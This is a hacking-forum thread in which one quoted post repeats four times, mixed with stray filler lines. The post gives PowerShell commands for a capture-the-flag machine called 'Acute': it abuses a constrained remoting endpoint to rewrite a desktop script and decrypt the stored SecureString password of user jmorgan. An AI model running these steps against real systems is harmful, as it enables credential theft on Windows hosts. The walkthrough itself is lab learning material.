(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute




Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pawn the box

Note: We cannot run much commands as the imonk user. We can check by running this

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}

We can use Set-Content. So we replace the last line in the powershell script on imonks user desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}

We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}

Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))

After which we run it

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}

We have successfully decrypted the SecureString password

Note:
ConverTo-SecureString uses a key thus preventing us from decrypting the password on another machine
So we have to do it on the host only



Hope you learned something
Leave a Rep if that helped

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute




Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pawn the box

Note: We cannot run much commands as the imonk user. We can check by running this

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}

We can use Set-Content. So we replace the last line in the powershell script on imonks user desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}

We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}

Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))

After which we run it

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}

We have successfully decrypted the SecureString password

Note:
ConverTo-SecureString uses a key thus preventing us from decrypting the password on another machine
So we have to do it on the host only



Hope you learned something
Leave a Rep if that helped

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute




Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pawn the box

Note: We cannot run much commands as the imonk user. We can check by running this

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}

We can use Set-Content. So we replace the last line in the powershell script on imonks user desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}

We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}

Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))

After which we run it

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}

We have successfully decrypted the SecureString password

Note:
ConverTo-SecureString uses a key thus preventing us from decrypting the password on another machine
So we have to do it on the host only



Hope you learned something
Leave a Rep if that helped



ppppppppppppppppppppppppp

(June 19, 2022, 03:07 PM)langetmama11 Wrote: Available writeup for this machine is down on anonfiles

Here's a working one

Write up
https://fdlucifer.github.io/2022/02/16/acute

i



Edit: I have added my personal findings for those who want to reverse the SecureString of user jmorgan
This is for learning purposes
Do it after you pawn the box

Note: We cannot run much commands as the imonk user. We can check by running this

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {get-command}

We can use Set-Content. So we replace the last line in the powershell script on imonks user desktop

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {((cat "C:\Users\imonks\Desktop\wm.ps1") -replace 'Invoke-Command -ScriptBlock \{Get-Volume} -ComputerName Acute-PC01 -Credential \$creds','[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))') |set-content -path "C:\Users\imonks\Desktop\wm.ps1"}

We can cat the script to see if it was written

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {cat C:\Users\imonks\Desktop\wm.ps1}

Final Script should look like this

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($passwd))

After which we run it

Invoke-Command -computername ATSSERVER -ConfigurationName dc_manage -credential $cred -command {C:\Users\imonks\Desktop\wm.ps1}

We have successfully decrypted the SecureString password

Note:
ConverTo-SecureString uses a key thus preventing us from decrypting the password on another machine
So we have to do it on the host only



Hope you learned something
Leave a Rep if that helped